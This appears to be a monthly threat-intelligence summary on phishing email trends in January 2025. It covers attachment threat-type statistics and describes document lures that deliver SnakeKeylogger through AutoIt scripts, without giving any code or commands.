Trends Report on Phishing Emails in January 2025
Statistics on Attachment Threat Types
Statistics on Attachment Threats in January 2025
In January 2025, the most prevalent threat type among phishing email attachments was Phishing (48%). This is the type where threat actors use HTML and other scripts to mimic login pages, advertising page layouts, logos, and fonts to create deceptive pages that can lure users into entering their account credentials. Subsequently, the threat actors transmit this information to their C2 server or lead users to fake sites. This type of phishing attack not only uses scripts but also includes hyperlinks in documents like PDFs to trick users into visiting phishing sites created by threat actors.
The second most common threat type is Trojan (44%). This malware tricks users into executing it by using double extensions or filenames with legitimate names.
The third most common threat type is malware that steals user information (Infostealer, 4%), followed by malware that downloads additional malware from C2 (Downloader, 2%), with Guloader being a prominent example. Following that, security vulnerability exploits (Exploit, <1%) were detected.
Compared to last month, the percentage of phishing malware significantly decreased from 77% to 48% this month. The quantity also decreased in addition to the percentage, showing that overall phishing threats were relatively lower. This is also seen in the statistics under [Trend in Phishing (FakePage) Distribution Volume].
Figure 1. Statistics on attachment threats
In addition, the data on the distribution of samples by category in the past 6 months is reflected in the recent trends of phishing email threats. Also, through the statistics on the file extensions of attachments in phishing emails, it is possible to understand the file formats used in phishing emails. Other statistics that are not covered in this summary can be found in the full ATIP report.
Distribution of Korean emails
Cases where the emails are written in Korean are classified, and the titles and attachment file names of the samples are partially disclosed. This allows for the identification of keyword information that frequently appears in phishing email threats.
Figure 2. A list of phishing emails distributed in Korean
Document Type
This introduces cases of phishing emails distributed using the Document-type extension. The Document type mainly uses Word (Docx), Excel (Xlsx), Hangeul (HWP), and PDF documents, claiming that login is required to view the document or inducing users to download a viewer, which downloads and executes malware. In addition, malicious behaviors are performed simultaneously with document viewing by utilizing vulnerabilities in MS Office or Hancom Office software, and VBA macros.
Figure 3. Attached document (.doc)
Figure 4. Extracted files – AutoIt script (left), encrypted data (right)
The malware that is ultimately executed is a type of SnakeKeylogger malware, which collects various information present on the system (PC) and sends it to the C2. The threat actor is using a Telegram channel as the C2. Detailed analysis of this type of malware is available in previous ASEC Blog posts.
Recently, the type that creates executable files using AutoIt scripts and distributes them via phishing emails has significantly increased, reaching a level similar to previous .NET samples. Related statistics and analysis can also be found in the ASEC Blog post below.
※ Please refer to the attachment for more details.
